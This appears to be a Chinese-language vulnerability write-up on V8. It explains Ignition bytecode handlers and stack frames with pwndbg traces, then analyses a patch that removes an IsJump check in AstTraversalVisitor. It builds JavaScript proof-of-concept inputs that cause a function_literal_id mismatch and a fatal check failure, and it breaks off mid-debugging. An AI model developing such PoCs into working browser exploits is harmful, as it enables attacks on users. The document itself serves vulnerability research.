0x7f0a68ec9476 <Builtins_LdaConstantHandler+758> mov rbp, qword ptr [rbp]
0x7f0a68ec947a <Builtins_LdaConstantHandler+762> mov r9, rbx
0x7f0a68ec947d <Builtins_LdaConstantHandler+765> add rsp, 0x40
► 0x7f0a68ec9481 <Builtins_LdaConstantHandler+769> jmp rcx <Builtins_LdaZeroHandler>
↓
0x7f0a68ec8d80 <Builtins_LdaZeroHandler> lea rbx, [rip - 7] <0x7f0a68ec8d80>
0x7f0a68ec8d87 <Builtins_LdaZeroHandler+7> cmp rbx, rcx
0x7f0a68ec8d8a <Builtins_LdaZeroHandler+10> je Builtins_LdaZeroHandler+28 <Builtins_LdaZeroHandler+28>
↓
0x7f0a68ec8d9c <Builtins_LdaZeroHandler+28> lea rbx, [r9 + 1]
0x7f0a68ec8da0 <Builtins_LdaZeroHandler+32> movzx edx, byte ptr [rbx + r14]
在源码src/interpreter/interpreter-generator.cc
中实现了所有字节码的Handler,比如我们上面调试的LdaConstant
// LdaConstant <idx>
//
// Load constant literal at |idx| in the constant pool into the accumulator.
IGNITION_HANDLER(LdaConstant, InterpreterAssembler) {
Node* constant = LoadConstantPoolEntryAtOperandIndex(0);
SetAccumulator(constant);
Dispatch();
}
结尾通过Dispatch
实现自动执行到下一个bytecode。
理解字节码/虚拟机架构
对于如下代码,我们打印一下字节码
function fun(x) {
var a = 0x666;
if (x) {
print("hello");
} else {
print("world");
}
return a;
}
%DebugPrint(fun);
%SystemBreak();
fun(true);
fun(false);
[generated bytecode for function: ]
Parameter count 1
Register count 4
Frame size 32
0x3225d5b9e9da @ 0 : 12 00 LdaConstant [0] ;从常量池加载第0个元素
0x3225d5b9e9dc @ 2 : 26 fa Star r1 ;存入r1寄存器
0x3225d5b9e9de @ 4 : 0b LdaZero ;累加器清零
0x3225d5b9e9df @ 5 : 26 f9 Star r2 ;存入r2寄存器
0x3225d5b9e9e1 @ 7 : 27 fe f8 Mov <closure>, r3
0x3225d5b9e9e4 @ 10 : 61 2d 01 fa 03 CallRuntime [DeclareGlobals], r1-r3 ;声明fun函数
0 E> 0x3225d5b9e9e9 @ 15 : a5 StackCheck ;栈检查
125 S> 0x3225d5b9e9ea @ 16 : 13 01 00 LdaGlobal [1], [0] ;从常量池取出第1个元素作为名称,找到变量,这里找到的是fun函数对象
0x3225d5b9e9ed @ 19 : 26 fa Star r1 ;存入r1
0x3225d5b9e9ef @ 21 : 61 65 01 fa 01 CallRuntime [DebugPrint], r1-r1
143 S> 0x3225d5b9e9f4 @ 26 : 61 a7 01 fb 00 CallRuntime [SystemBreak], r0-r0
159 S> 0x3225d5b9e9f9 @ 31 : 0d LdaUndefined
0x3225d5b9e9fa @ 32 : 26 f9 Star r2
0x3225d5b9e9fc @ 34 : 13 01 00 LdaGlobal [1], [0]
0x3225d5b9e9ff @ 37 : 26 fa Star r1
0x3225d5b9ea01 @ 39 : 10 LdaTrue
0x3225d5b9ea02 @ 40 : 26 f8 Star r3
159 E> 0x3225d5b9ea04 @ 42 : 5f fa f9 02 CallNoFeedback r1, r2-r3 ;调用fun函数
170 S> 0x3225d5b9ea08 @ 46 : 0d LdaUndefined
0x3225d5b9ea09 @ 47 : 26 f9 Star r2
0x3225d5b9ea0b @ 49 : 13 01 00 LdaGlobal [1], [0]
0x3225d5b9ea0e @ 52 : 26 fa Star r1
0x3225d5b9ea10 @ 54 : 11 LdaFalse
0x3225d5b9ea11 @ 55 : 26 f8 Star r3
170 E> 0x3225d5b9ea13 @ 57 : 5f fa f9 02 CallNoFeedback r1, r2-r3 ;调用fun函数
0x3225d5b9ea17 @ 61 : 26 fb Star r0
201 S> 0x3225d5b9ea19 @ 63 : a9 Return
Constant pool (size = 2)
0x3225d5b9e959: [FixedArray] in OldSpace
- map: 0x0fb2739007b1 <Map>
- length: 2
0: 0x3225d5b9e8c1 <FixedArray[4]>
1: 0x3225d5b9e7b9 <String[#3]: fun>
Handler Table (size = 0)
有关字节码的解释,可以在src/interpreter/interpreter-generator.cc
文件中查看。从字节码中,我们可以知道,每一个函数都有一个常量池,里面存储着一些常量。这个常量池是在之前分析的字节码生成过程中的FinalizeUnoptimizedCompilationJob
函数中生成的:该函数调用了job->FinalizeJob(shared_info, isolate),
最终进入下面的InterpreterCompilationJob::FinalizeJobImpl:
InterpreterCompilationJob::Status InterpreterCompilationJob::FinalizeJobImpl(
Handle<SharedFunctionInfo> shared_info, Isolate* isolate) {
RuntimeCallTimerScope runtimeTimerScope(
parse_info()->runtime_call_stats(),
RuntimeCallCounterId::kCompileIgnitionFinalization);
TRACE_EVENT0(TRACE_DISABLED_BY_DEFAULT("v8.compile"),
"V8.CompileIgnitionFinalization");
Handle<BytecodeArray> bytecodes =
generator()->FinalizeBytecode(isolate, parse_info()->script());
if (generator()->HasStackOverflow()) {
return FAILED;
}
if (ShouldPrintBytecode(shared_info)) {
StdoutStream os;
std::unique_ptr<char[]> name =
compilation_info()->literal()->GetDebugName();
os << "[generated bytecode for function: " << name.get() << "]"
<< std::endl;
bytecodes->Disassemble(os);
os << std::flush;
}
compilation_info()->SetBytecodeArray(bytecodes);
return SUCCEEDED;
}
其中在FinalizeBytecode
中调用了AllocateDeferredConstants
生成了常量池
Handle<BytecodeArray> BytecodeGenerator::FinalizeBytecode(
Isolate* isolate, Handle<Script> script) {
.................
AllocateDeferredConstants(isolate, script);
.................
AllocateDeferredConstants函数如下
void BytecodeGenerator::AllocateDeferredConstants(Isolate* isolate,
Handle<Script> script) {
// Build global declaration pair arrays.
for (GlobalDeclarationsBuilder* globals_builder : global_declarations_) {
Handle<FixedArray> declarations =
globals_builder->AllocateDeclarations(info(), script, isolate);
if (declarations.is_null()) return SetStackOverflow();
builder()->SetDeferredConstantPoolEntry(
globals_builder->constant_pool_entry(), declarations);
}
// Find or build shared function infos.
.....................
// Find or build shared function infos for the native function templates.
.....................
// Build object literal constant properties
.....................
// Build array literal constant elements
.....................
// Build class literal boilerplates.
.....................
// Build template literals.
.....................
}
现在我们来研究一下虚拟机的栈结构
+-------------------------------------+--------------+
| ........... | |
| | |
+-------------------------------------+ |
| R2 | |
| | |
+-------------------------------------+ |
| | |
| R1 | |
+-------------------------------------+ |
| | |
| R0 | |
+-------------------------------------+ |
| | |
| Bytecode offset | |
| | |
+-------------------------------------+ |
| | |
| Bytecode Array | | Callee Frame
| | +--------------------->
+-------------------------------------+ |
| | |
| JSFunction | |
| | |
+-------------------------------------+ |
| Context | |
RBP | | |
<---------------------------------------------------------+ |
| | |
| Previous BP | |
| | |
+-------------------------------------+ |
| | |
| Return Address | |
| | |
+----------------------------------------------------+
| | |
| Argument 3 | |
| | |
+-------------------------------------+ |
| | |
| Argument 2 | |
| | |
+-------------------------------------+ |
| | |
| Argument 1 | | Caller Frame
| | +------------------------->
+-------------------------------------+ |
| | |
| JSGlobalProxy | |
| | |
+-------------------------------------+ |
| | |
| ........ | |
| | |
+-------------------------------------+--------------+
如图是v8虚拟机的栈结构,为了实际调试,首先,我们观察到fun函数
DebugPrint: 0x1ff32561ead1: [Function] in OldSpace
- map: 0x250f54a803b9 <Map(HOLEY_ELEMENTS)> [FastProperties]
- prototype: 0x1ff325601ff1 <JSFunction (sfi = 0x1a302888009)>
- elements: 0x08396ef00c21 <FixedArray[0]> [HOLEY_ELEMENTS]
- function prototype:
- initial_map:
- shared_info: 0x1ff32561e8f1 <SharedFunctionInfo fun>
- name: 0x1ff32561e7b9 <String[#3]: fun>
- builtin: CompileLazy
- formal_parameter_count: 1
- kind: NormalFunction
- context: 0x1ff325601749 <NativeContext[247]>
- code: 0x054bd2f04641 <Code BUILTIN CompileLazy>
它的入口点是BUILTIN CompileLazy
,这一点我们前面介绍过,这是延迟编译,因为我们还没有调用到fun函数。当首次调用时,就会进入CompileLazy
编译。
该函数主要调用了Compiler::Compile(function, Compiler::KEEP_EXCEPTION, &is_compiled_scope)
RUNTIME_FUNCTION(Runtime_CompileLazy) {
HandleScope scope(isolate);
DCHECK_EQ(1, args.length());
CONVERT_ARG_HANDLE_CHECKED(JSFunction, function, 0);
#ifdef DEBUG
if (FLAG_trace_lazy && !function->shared()->is_compiled()) {
PrintF("[unoptimized: ");
function->PrintName();
PrintF("]\n");
}
#endif
StackLimitCheck check(isolate);
if (check.JsHasOverflowed(kStackSpaceRequiredForCompilation * KB)) {
return isolate->StackOverflow();
}
IsCompiledScope is_compiled_scope;
if (!Compiler::Compile(function, Compiler::KEEP_EXCEPTION,
&is_compiled_scope)) {
return ReadOnlyRoots(isolate).exception();
}
DCHECK(function->is_compiled());
return function->code();
}
其中Compiler::Compile(Handle<SharedFunctionInfo> shared_info, ClearExceptionFlag flag, IsCompiledScope* is_compiled_scope)
函数与之前分析的CompileToplevel
函数类似,只是在Compile函数中生成AST使用的是ParseAny
函数。
bool ParseAny(ParseInfo* info, Handle<SharedFunctionInfo> shared_info,
Isolate* isolate) {
DCHECK(!shared_info.is_null());
return info->is_toplevel() ? ParseProgram(info, isolate)
: ParseFunction(info, shared_info, isolate);
}
由于是函数,因此这里调用的是ParseFunction
函数。解析的过程与前面介绍的ParseProgram类似,这里先不叙述。
现在我们对第二个CallNoFeedback
字节码进行断点(因为第一个会触发CompileLazy进行函数编译),这样我们好观察函数调用的过程。对于字节码的断点调试,我们可以使用硬件读断点。
0x98299ea11 @ 55 : 26 f8 Star r3
170 E> 0x98299ea13 @ 57 : 5f fa f9 02 CallNoFeedback r1, r2-r3
0x98299ea17 @ 61 : 26 fb Star r0
201 S> 0x98299ea19 @ 63 : a9 Return
pwndbg> rwatch *0x98299ea13
Hardware read watchpoint 4: *0x98299ea13
继续运行即可来到对应的Handler
► 0x7f04a304fe32 <Builtins_StarHandler+50> movabs r10, 0x100000000
0x7f04a304fe3c <Builtins_StarHandler+60> cmp r10, rbx
0x7f04a304fe3f <Builtins_StarHandler+63> jae Builtins_StarHandler+78 <Builtins_StarHandler+78>
↓
0x7f04a304fe4e <Builtins_StarHandler+78> mov rcx, qword ptr [r15 + rbx*8]
0x7f04a304fe52 <Builtins_StarHandler+82> jmp rcx
↓
0x7f04a307b840 <Builtins_CallNoFeedbackHandler> lea rbx, [rip - 7] <0x7f04a307b840>
0x7f04a307b847 <Builtins_CallNoFeedbackHandler+7> cmp rbx, rcx
0x7f04a307b84a <Builtins_CallNoFeedbackHandler+10> je Builtins_CallNoFeedbackHandler+28 <Builtins_CallNoFeedbackHandler+28>
↓
0x7f04a307b85c <Builtins_CallNoFeedbackHandler+28> mov rdx, rbp
0x7f04a307b85f <Builtins_CallNoFeedbackHandler+31> mov dword ptr [rdx - 0x20], 0
0x7f04a307b866 <Builtins_CallNoFeedbackHandler+38> mov dword ptr [rdx - 0x1c], r9d
这里取到了字节码的操作数
..................
RCX 0xfffffffffffffffa
..................
R8 0x2
..................
0x7f04a307b85f <Builtins_CallNoFeedbackHandler+31> mov dword ptr [rdx - 0x20], 0
0x7f04a307b866 <Builtins_CallNoFeedbackHandler+38> mov dword ptr [rdx - 0x1c], r9d
0x7f04a307b86a <Builtins_CallNoFeedbackHandler+42> movsx rcx, byte ptr [r14 + r9 + 1]
0x7f04a307b870 <Builtins_CallNoFeedbackHandler+48> movzx r8d, byte ptr [r14 + r9 + 3]
0x7f04a307b876 <Builtins_CallNoFeedbackHandler+54> movabs r10, 0x100000000
► 0x7f04a307b880 <Builtins_CallNoFeedbackHandler+64> cmp r10, r8
0x7f04a307b883 <Builtins_CallNoFeedbackHandler+67> jae Builtins_CallNoFeedbackHandler+82 <Builtins_CallNoFeedbackHandler+82>
继续执行,这里开始取寄存器R1
..........
RCX 0xfffffffffffffffa
RDX 0x7ffe9194e4b0 —▸ 0x7ffe9194e4d8 —▸ 0x7ffe9194e540 —▸ 0x7ffe9194e590 —▸ 0x7ffe9194e8c0 ◂— ...
..........
RBP 0x7ffe9194e4b0 —▸ 0x7ffe9194e4d8 —▸ 0x7ffe9194e540 —▸ 0x7ffe9194e590 —▸ 0x7ffe9194e8c0 ◂— ...
..........
*RIP 0x7f227e7e089c (Builtins_CallNoFeedbackHandler+92) ◂— mov rcx, qword ptr [rdx + rcx*8]
0x7f227e7e0876 <Builtins_CallNoFeedbackHandler+54> movabs r10, 0x100000000
0x7f227e7e0880 <Builtins_CallNoFeedbackHandler+64> cmp r10, r8
0x7f227e7e0883 <Builtins_CallNoFeedbackHandler+67> jae Builtins_CallNoFeedbackHandler+82 <Builtins_CallNoFeedbackHandler+82>
↓
0x7f227e7e0892 <Builtins_CallNoFeedbackHandler+82> mov r11, qword ptr [rdx - 8]
0x7f227e7e0896 <Builtins_CallNoFeedbackHandler+86> movsx r9, byte ptr [r14 + r9 + 2]
► 0x7f227e7e089c <Builtins_CallNoFeedbackHandler+92> mov rcx, qword ptr [rdx + rcx*8]
0x7f227e7e08a0 <Builtins_CallNoFeedbackHandler+96> lea rbx, [rdx + r9*8]
可以知道,这是从RBP开始向上偏移-6个单元取数据,也就是R1位于-6个单元处,这与我们前面的栈结构图相对应了,并且可以知道,虚拟机使用的是系统栈,而不是独立的栈。继续查看数据
pwndbg> tel $rdx
00:0000│ rdx r12 rbp 0x7ffe9194e4b0 —▸ 0x7ffe9194e4d8 —▸ 0x7ffe9194e540 —▸ 0x7ffe9194e590 —▸ 0x7ffe9194e8c0 ◂— ...
01:0008│ 0x7ffe9194e4b8 —▸ 0x7f227e2b2380 (Builtins_JSEntryTrampoline+96) ◂— cmp qword ptr [rbp - 8], 0x20
02:0010│ 0x7ffe9194e4c0 —▸ 0x30703c601521 ◂— 0x210000196ee5507f
03:0018│ 0x7ffe9194e4c8 —▸ 0x423301ea31 ◂— 0x210000196ee55003
04:0020│ 0x7ffe9194e4d0 ◂— 0x20 /* ' ' */
05:0028│ 0x7ffe9194e4d8 —▸ 0x7ffe9194e540 —▸ 0x7ffe9194e590 —▸ 0x7ffe9194e8c0 —▸ 0x7ffe9194e960 ◂— ...
06:0030│ 0x7ffe9194e4e0 —▸ 0x7f227e2b210d (Builtins_JSEntry+141) ◂— mov r10, qword ptr [r13 + 0x2e28]
07:0038│ 0x7ffe9194e4e8 ◂— 0x0
pwndbg> job 0x30703c601521
0x30703c601521: [JSGlobalProxy]
- map: 0x196ee5507f79 <Map(HOLEY_ELEMENTS)> [FastProperties]
- prototype: 0x00423301a5b9 <JSObject>
- elements: 0x3938a2d00c21 <FixedArray[0]> [HOLEY_ELEMENTS]
- native context: 0x004233001749 <NativeContext[247]>
- properties: 0x3938a2d00c21 <FixedArray[0]> {}
现在我们跟踪进入fun函数,查看fun函数的栈结构
► 0x7f227e7b4e25 <Builtins_StarHandler+37> mov qword ptr [rdx + rbx*8], rax
0x7f227e7b4e29 <Builtins_StarHandler+41> add r9, 2
0x7f227e7b4e2d <Builtins_StarHandler+45> movzx ebx, byte ptr [r9 + r14]
pwndbg> tel $rdx
00:0000│ rdx rbp 0x7ffe9194e450 —▸ 0x7ffe9194e4b0 —▸ 0x7ffe9194e4d8 —▸ 0x7ffe9194e540 —▸ 0x7ffe9194e590 ◂— ...
01:0008│ 0x7ffe9194e458 —▸ 0x7f227e2bcd48 (Builtins_InterpreterEntryTrampoline+968) ◂— mov r14, qword ptr [rbp - 0x18]
02:0010│ 0x7ffe9194e460 —▸ 0x3938a2d00709 ◂— 0x3938a2d006
03:0018│ 0x7ffe9194e468 —▸ 0x30703c601521 ◂— 0x210000196ee5507f
04:0020│ 0x7ffe9194e470 —▸ 0x3938a2d00709 ◂— 0x3938a2d006
05:0028│ 0x7ffe9194e478 —▸ 0x3938a2d004d1 ◂— 0x3938a2d005
06:0030│ 0x7ffe9194e480 —▸ 0x423301ead1 ◂— 0x210000196ee55003
07:0038│ 0x7ffe9194e488 —▸ 0x3938a2d004d1 ◂— 0x3938a2d005
pwndbg> job 0x3938a2d00709
#false
pwndbg> job 0x30703c601521
0x30703c601521: [JSGlobalProxy]
- map: 0x196ee5507f79 <Map(HOLEY_ELEMENTS)> [FastProperties]
- prototype: 0x00423301a5b9 <JSObject>
- elements: 0x3938a2d00c21 <FixedArray[0]> [HOLEY_ELEMENTS]
- native context: 0x004233001749 <NativeContext[247]>
- properties: 0x3938a2d00c21 <FixedArray[0]> {}
从上述实验,我们大致理解了v8的虚拟机架构。现在,我们来讨论特殊的情况,即参数个数不匹配的情况。将测试代码稍作修改
function fun(x) {
var a = 0x666;
if (x) {
print("hello");
} else {
print("world");
}
return a;
}
%DebugPrint(fun);
%SystemBreak();
fun(true);
fun(false,0x666,0x123);
然后以同样的调试方法进行调试,会发现流程会先进入ArgumentsAdaptorTrampoline
► 0x7fd81751dab2 <Builtins_CallFunction_ReceiverIsAny+306> jmp Builtins_ArgumentsAdaptorTrampoline <Builtins_ArgumentsAdaptorTrampoline>
↓
0x7fd81751d580 <Builtins_ArgumentsAdaptorTrampoline> cmp rbx, 0xffff
0x7fd81751d587 <Builtins_ArgumentsAdaptorTrampoline+7> je Builtins_ArgumentsAdaptorTrampoline+244 <Builtins_ArgumentsAdaptorTrampoline+244>
实际上,这是用于适配参数的中间处理函数,有了该函数后的栈结构如下
+---------------------------------------------+---------+
| ........... | |
| | |
+---------------------------------------------+ |
| R2 | |
| | |
+---------------------------------------------+ |
| | |
| R1 | |
+---------------------------------------------+ |
| | |
| R0 | |
+---------------------------------------------+ |
| | |
| Bytecode offset | |
| | |
+---------------------------------------------+ | Callee Frame
| | +--------------------->
| Bytecode Array | |
| | |
+---------------------------------------------+ |
| | |
| JSFunction | |
| | |
+---------------------------------------------+ |
| Context | |
RBP | | |
<-----------------------------------------------------------------+ |
| | |
| ArgumentsAdaptorTrampoline BP | |
| | |
+---------------------------------------------+ |
| | |
| Return to ArgumentsAdaptorTrampoline+xx | |
| | |
+-------------------------------------------------------+
| | |
| Argument 1 | |
| | |
+---------------------------------------------+ |
| JSGlobalProxy | |
| | |
+---------------------------------------------+ |
| | | Adaptor Frame
| ....... | +---------------------->
| | |
+---------------------------------------------+ |
| | |
| Previous BP | |
| | |
+---------------------------------------------+ |
| | |
| Return Address | |
| | |
+-------------------------------------------------------+
| | |
| Argument 3 | |
| | |
+---------------------------------------------+ |
| | |
| Argument 2 | |
| | | Caller Frame
+---------------------------------------------+ +---------------------->
| | |
| Argument 1 | |
+---------------------------------------------+ |
| | |
| JSGlobalProxy | |
| | |
+---------------------------------------------+ |
| ...... | |
| | |
+---------------------------------------------+---------+
即ArgumentsAdaptorTrampoline
会处理好参数后再去调用目标函数,这种匹配方式带来了便利性但是却增加了时间的消耗,在新版的v8中已经移除了这种参数适配器栈帧,改用了另一种简易的方法即参数倒置。
0x02 漏洞分析利用
patch 分析
diff --git a/src/ast/ast-traversal-visitor.h b/src/ast/ast-traversal-visitor.h
index ac5f8f2f69..1d7c86f46b 100644
--- a/src/ast/ast-traversal-visitor.h
+++ b/src/ast/ast-traversal-visitor.h
@@ -116,7 +116,7 @@ void AstTraversalVisitor<Subclass>::VisitStatements(
for (int i = 0; i < stmts->length(); ++i) {
Statement* stmt = stmts->at(i);
RECURSE(Visit(stmt));
- if (stmt->IsJump()) break;
}
}
patch中去掉了AstTraversalVisitor
中的if (stmt->IsJump()) break;
一句代码,我们先来分析一下如何才能到达这个漏洞点的地方。
延迟编译CompileLazy的AST解析函数ParseFunction
内部调用的DoParseFunction源码如下,
FunctionLiteral* Parser::DoParseFunction(Isolate* isolate, ParseInfo* info,
const AstRawString* raw_name) {
............................
FunctionKind kind = info->function_kind();
if (IsArrowFunction(kind)) {
.............................
if (GetLastFunctionLiteralId() != info->function_literal_id() - 1) {
if (has_error()) return nullptr;
// If there were FunctionLiterals in the parameters, we need to
// renumber them to shift down so the next function literal id for
// the arrow function is the one requested.
AstFunctionLiteralIdReindexer reindexer(
stack_limit_,
(info->function_literal_id() - 1) - GetLastFunctionLiteralId());
for (auto p : formals.params) {
if (p->pattern != nullptr) reindexer.Reindex(p->pattern);
if (p->initializer() != nullptr) {
reindexer.Reindex(p->initializer());
}
}
ResetFunctionLiteralId();
SkipFunctionLiterals(info->function_literal_id() - 1);
}
Expression* expression = ParseArrowFunctionLiteral(formals);
// Scanning must end at the same position that was recorded
// previously. If not, parsing has been interrupted due to a stack
// overflow, at which point the partially parsed arrow function
// concise body happens to be a valid expression. This is a problem
// only for arrow functions with single expression bodies, since there
// is no end token such as "}" for normal functions.
if (scanner()->location().end_pos == info->end_position()) {
// The pre-parser saw an arrow function here, so the full parser
// must produce a FunctionLiteral.
DCHECK(expression->IsFunctionLiteral());
result = expression->AsFunctionLiteral();
}
} else if (IsDefaultConstructor(kind)) {
DCHECK_EQ(scope(), outer);
result = DefaultConstructor(raw_name, IsDerivedConstructor(kind),
info->start_position(), info->end_position());
} else {
ZonePtrList<const AstRawString>* arguments_for_wrapped_function =
info->is_wrapped_as_function()
? PrepareWrappedArguments(isolate, info, zone())
: nullptr;
result = ParseFunctionLiteral(
raw_name, Scanner::Location::invalid(), kSkipFunctionNameCheck, kind,
kNoSourcePosition, function_type, info->language_mode(),
arguments_for_wrapped_function);
}
...................
}
其将函数类型分为了三种类别:箭头函数、默认构造函数、普通函数。如果箭头函数的参数里存在函数的定义的话,将会使用AstFunctionLiteralIdReindexer
将这些函数的function_literal_id
进行reindex确定顺序。而AstFunctionLiteralIdReindexer
的源码如下
void AstFunctionLiteralIdReindexer::Reindex(Expression* pattern) {
Visit(pattern);
}
void AstFunctionLiteralIdReindexer::VisitFunctionLiteral(FunctionLiteral* lit) {
AstTraversalVisitor::VisitFunctionLiteral(lit);
lit->set_function_literal_id(lit->function_literal_id() + delta_);
}
从代码我们可以知道,这个Reindex实际上就是在遍历AST语法树,如果遇到函数定义,就调用AstTraversalVisitor::VisitFunctionLiteral
,然后为当前的FunctionLiteral
设置新的function_literal_id
,与原值的区别在于加上了一个delta_。AstTraversalVisitor::VisitFunctionLiteral
代码如下,
template <class Subclass>
void AstTraversalVisitor<Subclass>::VisitFunctionLiteral(
FunctionLiteral* expr) {
PROCESS_EXPRESSION(expr);
DeclarationScope* scope = expr->scope();
RECURSE_EXPRESSION(VisitDeclarations(scope->declarations()));
// A lazily parsed function literal won't have a body.
if (expr->scope()->was_lazily_parsed()) return;
RECURSE_EXPRESSION(VisitStatements(expr->body()));
}
这里会调用VisitStatements
继续遍历函数里面的内容,而VisitStatements
就是漏洞点所在的位置。由此我们要想到达漏洞点,需要有箭头函数,且参数里还需要有一个函数。
POC构造
function fun(x) {
var f = (v1 = (o)=>{print("hello");})=>{};
f();
}
fun(true);
首先f是一个箭头函数,而f箭头函数的参数里还有一个函数v1 = (o)=>{print("hello");}
,这样就能触发进入AstFunctionLiteralIdReindexer。为什么需要Reindex,因为解析是按照顺序的,fun的literal_id
为1,而v1的literal_id为2,f的literal_id为3,但是v1的函数被调用的顺序不可能先于f,因为我们只能在f内部去调用v1(如var f = (v1 = (o)=>{print("hello");})=>{v1();};
)。因此f得先被编译,因此需要将f的literal_id
更正为2。
现在需要研究一下漏洞是哪个,是什么造成了漏洞,Parser阶段结束后就是进入GenerateUnoptimizedCode
遍历AST生成字节码,其中也有一个VisitStatements
void BytecodeGenerator::VisitStatements(
const ZonePtrList<Statement>* statements) {
for (int i = 0; i < statements->length(); i++) {
// Allocate an outer register allocations scope for the statement.
RegisterAllocationScope allocation_scope(this);
Statement* stmt = statements->at(i);
Visit(stmt);
if (builder()->RemainderOfBlockIsDead()) break;
}
}
其中的RemainderOfBlockIsDead
代码如下
bool RemainderOfBlockIsDead() const { return exit_seen_in_block_; }
void BytecodeArrayWriter::UpdateExitSeenInBlock(Bytecode bytecode) {
switch (bytecode) {
case Bytecode::kReturn:
case Bytecode::kThrow:
case Bytecode::kReThrow:
case Bytecode::kAbort:
case Bytecode::kJump:
case Bytecode::kJumpConstant:
case Bytecode::kSuspendGenerator:
exit_seen_in_block_ = true;
break;
default:
break;
}
我们再回过头看一下AstTraversalVisitor<Subclass>::VisitStatements
阶段的break条件
bool Statement::IsJump() const {
switch (node_type()) {
#define JUMP_NODE_LIST(V) \
V(Block) \
V(ExpressionStatement) \
V(ContinueStatement) \
V(BreakStatement) \
V(ReturnStatement) \
V(IfStatement)
#define GENERATE_CASE(Node) \
case k##Node: \
return static_cast<const Node*>(this)->IsJump();
JUMP_NODE_LIST(GENERATE_CASE)
#undef GENERATE_CASE
#undef JUMP_NODE_LIST
default:
return false;
}
}
对比发现IsJump
中多了一个对IfStatement
的判断。其中IfStatement
中的IsJump()源码如下
class IfStatement final : public Statement {
public:
..................
bool IsJump() const {
return HasThenStatement() && then_statement()->IsJump()
&& HasElseStatement() && else_statement()->IsJump();
}
也就是这样的JS代码满足条件
if (a) {
return;
} else {
return;
}
即在if和else分支中都有控制流语句,当AstTraversalVisitor
遍历语法树时遇到这样的语句,就会停止遍历,这意味着位于这样语句后面的函数将不会被reindex,仍然保持原来的literal_id
。而BytecodeGenerator阶段遇到这样的语句不会break,继续生成后面的字节码。我们来构造这样一个样本,观察一下会发生什么
function fun() {
var f = (v1 = (o)=>{
var a = 0;
if (a) {
return;
} else {
return;
}
function f1() {
print("f1");
}
function f2() {
print("f2")
}
})=>{};
f();
}
fun();
语法树如下
[generating bytecode for function: ]
--- AST ---
FUNC at 0
. KIND 0
. SUSPEND COUNT 0
. NAME ""
. INFERRED NAME ""
. DECLS
. . FUNCTION "fun" = function fun
. EXPRESSION STATEMENT at 256
. . ASSIGN at -1
. . . VAR PROXY local[0] (0x55bd8d2babd0) (mode = TEMPORARY, assigned = true) ".result"
. . . CALL
. . . . VAR PROXY unallocated (0x55bd8d2baae0) (mode = VAR, assigned = true) "fun"
. RETURN at -1
. . VAR PROXY local[0] (0x55bd8d2babd0) (mode = TEMPORARY, assigned = true) ".result"
[generating bytecode for function: fun]
--- AST ---
FUNC at 12
. KIND 0
. SUSPEND COUNT 0
. NAME "fun"
. DECLS
. . VARIABLE (0x55bd8d2bc908) (mode = VAR, assigned = false) "f"
. BLOCK NOCOMPLETIONS at -1
. . EXPRESSION STATEMENT at 28
. . . INIT at 28
. . . . VAR PROXY local[0] (0x55bd8d2bc908) (mode = VAR, assigned = false) "f"
. . . . FUNC LITERAL at 28
. . . . . NAME f
. . . . . INFERRED NAME f
. EXPRESSION STATEMENT at 248
. . CALL
. . . VAR PROXY local[0] (0x55bd8d2bc908) (mode = VAR, assigned = false) "f"
[generating bytecode for function: f]
--- AST ---
FUNC at 28
. KIND 8
. SUSPEND COUNT 0
. NAME ""
. PARAMS
. . VAR (0x55bd8d2bfbe8) (mode = TEMPORARY, assigned = true) ""
. DECLS
. . VARIABLE (0x55bd8d2becb8) (mode = LET, assigned = false) "v1"
. BLOCK NOCOMPLETIONS at -1
. . EXPRESSION STATEMENT at -1
. . . INIT at -1
. . . . VAR PROXY local[0] (0x55bd8d2becb8) (mode = LET, assigned = false) "v1"
. . . . CONDITIONAL at -1
. . . . . CONDITION at -1
. . . . . . EQ_STRICT at -1
. . . . . . . VAR PROXY parameter[0] (0x55bd8d2bfbe8) (mode = TEMPORARY, assigned = true) ""
. . . . . . . LITERAL undefined
. . . . . THEN at 34
. . . . . . FUNC LITERAL at 34
. . . . . . . NAME v1
. . . . . . . INFERRED NAME
. . . . . ELSE at -1
. . . . . . VAR PROXY parameter[0] (0x55bd8d2bfbe8) (mode = TEMPORARY, assigned = true) ""
发现v1里面的内容并没有生成语法树,经过测试,发现要想强制让一个函数还没执行到的时候就解析,可以改成这种形式(function() {......})
即匿名函数的形式,同理,我们发现f1和f2的内容也没有解析,我们也一并解析,修改为如下:
function fun() {
var f = (v1 = (function() {
var a = 0;
if (a) {
return;
} else {
return;
}
(function() {
print("f1");
});
(function() {
print("f2")
});
}))=>{};
f();
}
fun();
这回AST就完整了
[generating bytecode for function: v1]
--- AST ---
FUNC at 35
. KIND 0
. SUSPEND COUNT 0
. NAME "v1"
. INFERRED NAME ""
. DECLS
. . VARIABLE (0x55f955ee7f68) (mode = VAR, assigned = false) "a"
. BLOCK NOCOMPLETIONS at -1
. . EXPRESSION STATEMENT at 62
. . . INIT at 62
. . . . VAR PROXY local[0] (0x55f955ee7f68) (mode = VAR, assigned = false) "a"
. . . . LITERAL 0
. IF at 71
. . CONDITION at 75
. . . VAR PROXY local[0] (0x55f955ee7f68) (mode = VAR, assigned = false) "a"
. . THEN at -1
. . . BLOCK at -1
. . . . RETURN at 89
. . . . . LITERAL undefined
. . ELSE at -1
. . . BLOCK at -1
. . . . RETURN at 121
. . . . . LITERAL undefined
. EXPRESSION STATEMENT at 143
. . FUNC LITERAL at 144
. . . NAME
. . . INFERRED NAME
. EXPRESSION STATEMENT at 195
. . FUNC LITERAL at 196
. . . NAME
. . . INFERRED NAME
[generating bytecode for function: ]
--- AST ---
FUNC at 144
. KIND 0
. SUSPEND COUNT 0
. NAME ""
. INFERRED NAME ""
. EXPRESSION STATEMENT at 166
. . CALL
. . . VAR PROXY unallocated (0x55f955ee8e98) (mode = DYNAMIC_GLOBAL, assigned = false) "print"
. . . LITERAL "f1"
[generating bytecode for function: ]
--- AST ---
FUNC at 196
. KIND 0
. SUSPEND COUNT 0
. NAME ""
. INFERRED NAME ""
. EXPRESSION STATEMENT at 218
. . CALL
. . . VAR PROXY unallocated (0x55f955ee8e98) (mode = DYNAMIC_GLOBAL, assigned = false) "print"
. . . LITERAL "f2"
运行时报错
#
# Fatal error in ../../src/objects.cc, line 4857
# Check failed: fun->function_literal_id() < shared_function_infos()->length() (6 vs. 6).
我们来分析一下,在ast-traversal-visitor.h:119
处(if (stmt->IsJump())
break;)下断点
In file: /home/sea/Desktop/v8/src/ast/ast-traversal-visitor.h
114 void AstTraversalVisitor<Subclass>::VisitStatements(
115 const ZonePtrList<Statement>* stmts) {
116 for (int i = 0; i < stmts->length(); ++i) {
117 Statement* stmt = stmts->at(i);
